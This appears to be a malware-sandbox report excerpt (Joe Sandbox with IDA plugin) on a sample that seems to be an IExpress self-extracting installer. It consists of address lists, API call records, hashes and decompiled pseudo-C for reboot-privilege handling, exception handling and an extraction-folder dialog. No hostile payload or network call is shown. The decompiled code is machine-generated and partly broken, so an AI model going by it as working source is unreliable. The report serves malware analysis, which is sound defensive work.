                                                                                                                                                                                                                                                0x00106172
                                                                                                                                                                                                                                                0x0010617c
                                                                                                                                                                                                                                                0x00106190
                                                                                                                                                                                                                                                0x00106190
                                                                                                                                                                                                                                                0x00106196
                                                                                                                                                                                                                                                0x001061a5
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001061ab
                                                                                                                                                                                                                                                0x001061b9
                                                                                                                                                                                                                                                0x001061c6
                                                                                                                                                                                                                                                0x001061c6
                                                                                                                                                                                                                                                0x0010617e
                                                                                                                                                                                                                                                0x00106180
                                                                                                                                                                                                                                                0x0010618a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010618a
                                                                                                                                                                                                                                                0x0010615e
                                                                                                                                                                                                                                                0x00106160
                                                                                                                                                                                                                                                0x0010616a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010616a
                                                                                                                                                                                                                                                0x0010615c
                                                                                                                                                                                                                                                0x0010614a
                                                                                                                                                                                                                                                0x0010610b
                                                                                                                                                                                                                                                0x0010610e
                                                                                                                                                                                                                                                0x0010610e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105e59
                                                                                                                                                                                                                                                0x00105e59
                                                                                                                                                                                                                                                0x00105e5c
                                                                                                                                                                                                                                                0x0010604f
                                                                                                                                                                                                                                                0x00106056
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010605c
                                                                                                                                                                                                                                                0x0010606e
                                                                                                                                                                                                                                                0x00106071
                                                                                                                                                                                                                                                0x00105f09
                                                                                                                                                                                                                                                0x00105f07
                                                                                                                                                                                                                                                0x00105f02
                                                                                                                                                                                                                                                0x00105efc
                                                                                                                                                                                                                                                0x00105ef7
                                                                                                                                                                                                                                                0x00105ef2
                                                                                                                                                                                                                                                0x00105f4c
                                                                                                                                                                                                                                                0x00105f4e
                                                                                                                                                                                                                                                0x00105f50
                                                                                                                                                                                                                                                0x00105f54
                                                                                                                                                                                                                                                0x00105ed4
                                                                                                                                                                                                                                                0x00105ea2
                                                                                                                                                                                                                                                0x00105ea4
                                                                                                                                                                                                                                                0x00105eaf
                                                                                                                                                                                                                                                0x00105eaf
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105e79
                                                                                                                                                                                                                                                0x00105e7d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105e83
                                                                                                                                                                                                                                                0x00105e83
                                                                                                                                                                                                                                                0x00105e83
                                                                                                                                                                                                                                                0x00105e85
                                                                                                                                                                                                                                                0x00105e85
                                                                                                                                                                                                                                                0x00105e8e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105e94
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105e94
                                                                                                                                                                                                                                                0x00105e8e
                                                                                                                                                                                                                                                0x00105e7d
                                                                                                                                                                                                                                                0x00105e77
                                                                                                                                                                                                                                                0x00105e6e
                                                                                                                                                                                                                                                0x00105e65
                                                                                                                                                                                                                                                0x00105e5c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105dd0
                                                                                                                                                                                                                                                0x00105dd0
                                                                                                                                                                                                                                                0x00105dd0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105dd0
                                                                                                                                                                                                                                                0x00105dce
                                                                                                                                                                                                                                                0x00105dca
                                                                                                                                                                                                                                                0x00105dba
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105d00
                                                                                                                                                                                                                                                0x00105dd9
                                                                                                                                                                                                                                                0x00105e04
                                                                                                                                                                                                                                                0x001061fe
                                                                                                                                                                                                                                                0x00105e0a
                                                                                                                                                                                                                                                0x00105e0c
                                                                                                                                                                                                                                                0x00105e17
                                                                                                                                                                                                                                                0x00105e17
                                                                                                                                                                                                                                                0x00105e04
                                                                                                                                                                                                                                                0x00106200
                                                                                                                                                                                                                                                0x00106200
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CharNextA.USER32(?,00000000,?,?), ref: 00105CEE
                                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00108B3E,00000104,00000000,?,?), ref: 00105DFC
                                                                                                                                                                                                                                                • CharUpperA.USER32(?), ref: 00105E3E
                                                                                                                                                                                                                                                • CharUpperA.USER32(-00000052), ref: 00105EE1
                                                                                                                                                                                                                                                • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00105F6F
                                                                                                                                                                                                                                                • CharUpperA.USER32(?), ref: 00105FA7
                                                                                                                                                                                                                                                • CharUpperA.USER32(-0000004E), ref: 00106008
                                                                                                                                                                                                                                                • CharUpperA.USER32(?), ref: 001060AA
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00101140,00000000,00000040,00000000), ref: 001061F1
                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 001061F8
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                                                                • String ID: "$"$:$RegServer
                                                                                                                                                                                                                                                • API String ID: 1203814774-25366791
                                                                                                                                                                                                                                                • Opcode ID: 38868b7b35e1e37737f7a0e9b3f7ffc7763beb0701eddb0d0489a24c7145be8d
                                                                                                                                                                                                                                                • Instruction ID: 3e6b4cc6357db81348841d183bf5e9fc2647a2f9be1790a64ba83caf95d16ccb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 38868b7b35e1e37737f7a0e9b3f7ffc7763beb0701eddb0d0489a24c7145be8d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78D14B71A08A559EEF358B388C487BB7B67AB16300F1441AAD4CAD75D1DBF48EC68F40
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 60%
                                                                                                                                                                                                                                                			E00101F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				int _v12;
                                                                                                                                                                                                                                                				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                                                                				void* _v28;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				signed int _t13;
                                                                                                                                                                                                                                                				int _t21;
                                                                                                                                                                                                                                                				void* _t25;
                                                                                                                                                                                                                                                				int _t28;
                                                                                                                                                                                                                                                				signed char _t30;
                                                                                                                                                                                                                                                				void* _t38;
                                                                                                                                                                                                                                                				void* _t40;
                                                                                                                                                                                                                                                				void* _t41;
                                                                                                                                                                                                                                                				signed int _t46;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t41 = __esi;
                                                                                                                                                                                                                                                				_t38 = __edi;
                                                                                                                                                                                                                                                				_t30 = __ecx;
                                                                                                                                                                                                                                                				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                                					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                                                                						L14:
                                                                                                                                                                                                                                                						if( *0x109a40 != 0) {
                                                                                                                                                                                                                                                							_pop(_t30);
                                                                                                                                                                                                                                                							_t44 = _t46;
                                                                                                                                                                                                                                                							_t13 =  *0x108004; // 0xb5a2e1bc
                                                                                                                                                                                                                                                							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                                                                							_push(_t38);
                                                                                                                                                                                                                                                							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                                                                								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                                                                								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                                                                								_v12 = 2;
                                                                                                                                                                                                                                                								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                                                                								CloseHandle(_v28);
                                                                                                                                                                                                                                                								_t41 = _t41;
                                                                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                                                                								if(_t21 != 0) {
                                                                                                                                                                                                                                                									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                                                                										_t25 = 1;
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										_t37 = 0x4f7;
                                                                                                                                                                                                                                                										goto L3;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									_t37 = 0x4f6;
                                                                                                                                                                                                                                                									goto L4;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_t37 = 0x4f5;
                                                                                                                                                                                                                                                								L3:
                                                                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                                                                								L4:
                                                                                                                                                                                                                                                								_push(0x10);
                                                                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                                                                								E001044B9(0, _t37);
                                                                                                                                                                                                                                                								_t25 = 0;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_pop(_t40);
                                                                                                                                                                                                                                                							return E00106CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                                                                							goto L16;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_t37 = 0x522;
                                                                                                                                                                                                                                                						_t28 = E001044B9(0, 0x522, 0x101140, 0, 0x40, 4);
                                                                                                                                                                                                                                                						if(_t28 != 6) {
                                                                                                                                                                                                                                                							goto L16;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							goto L14;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					__eax = E00101EA7(__ecx);
                                                                                                                                                                                                                                                					if(__eax != 2) {
                                                                                                                                                                                                                                                						L16:
                                                                                                                                                                                                                                                						return _t28;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						goto L12;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}


















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00101EFB
                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00101F02
                                                                                                                                                                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00101FD3
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                                • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                                • Opcode ID: 08d0c9327e047c43d3298b827bb3a92fe0b76983fc032c210a3bdf562a896f63
                                                                                                                                                                                                                                                • Instruction ID: 6fff0432f1819682de2645053d1b5c372523006d98099c1b712959a31d70787b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08d0c9327e047c43d3298b827bb3a92fe0b76983fc032c210a3bdf562a896f63
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC21B5B1B403067BDB206BA19C4AFBF76B8EB85B10F500019FB82E65C5D7F888459661
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00106CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                                				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                                                                				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                                                                			}




                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00106E26,00101000), ref: 00106CF7
                                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(00106E26,?,00106E26,00101000), ref: 00106D00
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409,?,00106E26,00101000), ref: 00106D0B
                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,00106E26,00101000), ref: 00106D12
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3231755760-0
                                                                                                                                                                                                                                                • Opcode ID: de775f83bae0d369da9eb213900555b483b5d2427bbf241fdd38c7b95b62bf74
                                                                                                                                                                                                                                                • Instruction ID: f97ec31f532184a6c03cff6de72c5619622380a09dbac4199bcfc7fb983dc01c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: de775f83bae0d369da9eb213900555b483b5d2427bbf241fdd38c7b95b62bf74
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4ED0C932000308BBDB002BE1EC0CA593F28FF48212F844000F35982820CAB244918B52
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 76%
                                                                                                                                                                                                                                                			E00103210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* _t6;
                                                                                                                                                                                                                                                				void* _t10;
                                                                                                                                                                                                                                                				int _t20;
                                                                                                                                                                                                                                                				int _t21;
                                                                                                                                                                                                                                                				int _t23;
                                                                                                                                                                                                                                                				char _t24;
                                                                                                                                                                                                                                                				long _t25;
                                                                                                                                                                                                                                                				int _t27;
                                                                                                                                                                                                                                                				int _t30;
                                                                                                                                                                                                                                                				void* _t32;
                                                                                                                                                                                                                                                				int _t33;
                                                                                                                                                                                                                                                				int _t34;
                                                                                                                                                                                                                                                				int _t37;
                                                                                                                                                                                                                                                				int _t38;
                                                                                                                                                                                                                                                				int _t39;
                                                                                                                                                                                                                                                				void* _t42;
                                                                                                                                                                                                                                                				void* _t46;
                                                                                                                                                                                                                                                				CHAR* _t49;
                                                                                                                                                                                                                                                				void* _t58;
                                                                                                                                                                                                                                                				void* _t63;
                                                                                                                                                                                                                                                				struct HWND__* _t64;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t64 = _a4;
                                                                                                                                                                                                                                                				_t6 = _a8 - 0x10;
                                                                                                                                                                                                                                                				if(_t6 == 0) {
                                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                                					L38:
                                                                                                                                                                                                                                                					EndDialog(_t64, ??);
                                                                                                                                                                                                                                                					L39:
                                                                                                                                                                                                                                                					__eflags = 1;
                                                                                                                                                                                                                                                					return 1;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t42 = 1;
                                                                                                                                                                                                                                                				_t10 = _t6 - 0x100;
                                                                                                                                                                                                                                                				if(_t10 == 0) {
                                                                                                                                                                                                                                                					E001043D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                                                                					SetWindowTextA(_t64, "lenta");
                                                                                                                                                                                                                                                					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                                                                					__eflags =  *0x109a40 - _t42; // 0x3
                                                                                                                                                                                                                                                					if(__eflags == 0) {
                                                                                                                                                                                                                                                						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					L36:
                                                                                                                                                                                                                                                					return _t42;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(_t10 == _t42) {
                                                                                                                                                                                                                                                					_t20 = _a12 - 1;
                                                                                                                                                                                                                                                					__eflags = _t20;
                                                                                                                                                                                                                                                					if(_t20 == 0) {
                                                                                                                                                                                                                                                						_t21 = GetDlgItemTextA(_t64, 0x835, 0x1091e4, 0x104);
                                                                                                                                                                                                                                                						__eflags = _t21;
                                                                                                                                                                                                                                                						if(_t21 == 0) {
                                                                                                                                                                                                                                                							L32:
                                                                                                                                                                                                                                                							_t58 = 0x4bf;
                                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                                							_push(0x10);
                                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                                							L25:
                                                                                                                                                                                                                                                							E001044B9(_t64, _t58);
                                                                                                                                                                                                                                                							goto L39;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t49 = 0x1091e4;
                                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                                							_t23 =  *_t49;
                                                                                                                                                                                                                                                							_t49 =  &(_t49[1]);
                                                                                                                                                                                                                                                							__eflags = _t23;
                                                                                                                                                                                                                                                						} while (_t23 != 0);
                                                                                                                                                                                                                                                						__eflags = _t49 - 0x1091e5 - 3;
                                                                                                                                                                                                                                                						if(_t49 - 0x1091e5 < 3) {
                                                                                                                                                                                                                                                							goto L32;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t24 =  *0x1091e5; // 0x3a
                                                                                                                                                                                                                                                						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                                                                						if(_t24 == 0x3a) {
                                                                                                                                                                                                                                                							L21:
                                                                                                                                                                                                                                                							_t25 = GetFileAttributesA(0x1091e4);
                                                                                                                                                                                                                                                							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                                                                							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                                								L26:
                                                                                                                                                                                                                                                								E0010658A(0x1091e4, 0x104, 0x101140);
                                                                                                                                                                                                                                                								_t27 = E001058C8(0x1091e4);
                                                                                                                                                                                                                                                								__eflags = _t27;
                                                                                                                                                                                                                                                								if(_t27 != 0) {
                                                                                                                                                                                                                                                									__eflags =  *0x1091e4 - 0x5c;
                                                                                                                                                                                                                                                									if( *0x1091e4 != 0x5c) {
                                                                                                                                                                                                                                                										L30:
                                                                                                                                                                                                                                                										_t30 = E0010597D(0x1091e4, 1, _t64, 1);
                                                                                                                                                                                                                                                										__eflags = _t30;
                                                                                                                                                                                                                                                										if(_t30 == 0) {
                                                                                                                                                                                                                                                											L35:
                                                                                                                                                                                                                                                											_t42 = 1;
                                                                                                                                                                                                                                                											__eflags = 1;
                                                                                                                                                                                                                                                											goto L36;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										L31:
                                                                                                                                                                                                                                                										_t42 = 1;
                                                                                                                                                                                                                                                										EndDialog(_t64, 1);
                                                                                                                                                                                                                                                										goto L36;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									__eflags =  *0x1091e5 - 0x5c;
                                                                                                                                                                                                                                                									if( *0x1091e5 == 0x5c) {
                                                                                                                                                                                                                                                										goto L31;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									goto L30;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                                                                								_push(0x10);
                                                                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                                                                								_t58 = 0x4be;
                                                                                                                                                                                                                                                								goto L25;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t32 = E001044B9(_t64, 0x54a, 0x1091e4, 0, 0x20, 4);
                                                                                                                                                                                                                                                							__eflags = _t32 - 6;
                                                                                                                                                                                                                                                							if(_t32 != 6) {
                                                                                                                                                                                                                                                								goto L35;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t33 = CreateDirectoryA(0x1091e4, 0);
                                                                                                                                                                                                                                                							__eflags = _t33;
                                                                                                                                                                                                                                                							if(_t33 != 0) {
                                                                                                                                                                                                                                                								goto L26;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                                							_push(0x10);
                                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                                							_push(0x1091e4);
                                                                                                                                                                                                                                                							_t58 = 0x4cb;
                                                                                                                                                                                                                                                							goto L25;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						__eflags =  *0x1091e4 - 0x5c;
                                                                                                                                                                                                                                                						if( *0x1091e4 != 0x5c) {
                                                                                                                                                                                                                                                							goto L32;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                                                                						if(_t24 != 0x5c) {
                                                                                                                                                                                                                                                							goto L32;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						goto L21;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t34 = _t20 - 1;
                                                                                                                                                                                                                                                					__eflags = _t34;
                                                                                                                                                                                                                                                					if(_t34 == 0) {
                                                                                                                                                                                                                                                						EndDialog(_t64, 0);
                                                                                                                                                                                                                                                						 *0x109124 = 0x800704c7;
                                                                                                                                                                                                                                                						goto L39;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					__eflags = _t34 != 0x834;
                                                                                                                                                                                                                                                					if(_t34 != 0x834) {
                                                                                                                                                                                                                                                						goto L36;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t37 = LoadStringA( *0x109a3c, 0x3e8, 0x108598, 0x200);
                                                                                                                                                                                                                                                					__eflags = _t37;
                                                                                                                                                                                                                                                					if(_t37 != 0) {
                                                                                                                                                                                                                                                						_t38 = E00104224(_t64, _t46, _t46);
                                                                                                                                                                                                                                                						__eflags = _t38;
                                                                                                                                                                                                                                                						if(_t38 == 0) {
                                                                                                                                                                                                                                                							goto L36;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t39 = SetDlgItemTextA(_t64, 0x835, 0x1087a0);
                                                                                                                                                                                                                                                						__eflags = _t39;
                                                                                                                                                                                                                                                						if(_t39 != 0) {
                                                                                                                                                                                                                                                							goto L36;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t63 = 0x4c0;
                                                                                                                                                                                                                                                						L9:
                                                                                                                                                                                                                                                						E001044B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                                                                						goto L38;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t63 = 0x4b1;
                                                                                                                                                                                                                                                					goto L9;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                                                			}

























                                                                                                                                                                                                                                                0x00103229
                                                                                                                                                                                                                                                0x0010322a
                                                                                                                                                                                                                                                0x0010322f
                                                                                                                                                                                                                                                0x001033ec
                                                                                                                                                                                                                                                0x001033f7
                                                                                                                                                                                                                                                0x00103410
                                                                                                                                                                                                                                                0x00103416
                                                                                                                                                                                                                                                0x0010341d
                                                                                                                                                                                                                                                0x0010342d
                                                                                                                                                                                                                                                0x0010342d
                                                                                                                                                                                                                                                0x00103438
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103438
                                                                                                                                                                                                                                                0x00103237
                                                                                                                                                                                                                                                0x00103243
                                                                                                                                                                                                                                                0x00103243
                                                                                                                                                                                                                                                0x00103246
                                                                                                                                                                                                                                                0x001032ee
                                                                                                                                                                                                                                                0x001032f4
                                                                                                                                                                                                                                                0x001032f6
                                                                                                                                                                                                                                                0x001033d4
                                                                                                                                                                                                                                                0x001033d6
                                                                                                                                                                                                                                                0x001033db
                                                                                                                                                                                                                                                0x001033dc
                                                                                                                                                                                                                                                0x001033de
                                                                                                                                                                                                                                                0x001033df
                                                                                                                                                                                                                                                0x00103370
                                                                                                                                                                                                                                                0x00103372
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103372
                                                                                                                                                                                                                                                0x001032fc
                                                                                                                                                                                                                                                0x00103301
                                                                                                                                                                                                                                                0x00103301
                                                                                                                                                                                                                                                0x00103303
                                                                                                                                                                                                                                                0x00103304
                                                                                                                                                                                                                                                0x00103304
                                                                                                                                                                                                                                                0x0010330a
                                                                                                                                                                                                                                                0x0010330d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103313
                                                                                                                                                                                                                                                0x00103318
                                                                                                                                                                                                                                                0x0010331a
                                                                                                                                                                                                                                                0x00103331
                                                                                                                                                                                                                                                0x00103332
                                                                                                                                                                                                                                                0x0010333a
                                                                                                                                                                                                                                                0x0010333d
                                                                                                                                                                                                                                                0x0010337c
                                                                                                                                                                                                                                                0x00103388
                                                                                                                                                                                                                                                0x0010338f
                                                                                                                                                                                                                                                0x00103394
                                                                                                                                                                                                                                                0x00103396
                                                                                                                                                                                                                                                0x001033a4
                                                                                                                                                                                                                                                0x001033ab
                                                                                                                                                                                                                                                0x001033b6
                                                                                                                                                                                                                                                0x001033be
                                                                                                                                                                                                                                                0x001033c3
                                                                                                                                                                                                                                                0x001033c5
                                                                                                                                                                                                                                                0x00103435
                                                                                                                                                                                                                                                0x00103437
                                                                                                                                                                                                                                                0x00103437
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103437
                                                                                                                                                                                                                                                0x001033c7
                                                                                                                                                                                                                                                0x001033c9
                                                                                                                                                                                                                                                0x001033cc
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001033cc
                                                                                                                                                                                                                                                0x001033ad
                                                                                                                                                                                                                                                0x001033b4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001033b4
                                                                                                                                                                                                                                                0x00103398
                                                                                                                                                                                                                                                0x00103399
                                                                                                                                                                                                                                                0x0010339b
                                                                                                                                                                                                                                                0x0010339c
                                                                                                                                                                                                                                                0x0010339d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010339d
                                                                                                                                                                                                                                                0x0010334c
                                                                                                                                                                                                                                                0x00103351
                                                                                                                                                                                                                                                0x00103354
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010335c
                                                                                                                                                                                                                                                0x00103362
                                                                                                                                                                                                                                                0x00103364
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103366
                                                                                                                                                                                                                                                0x00103367
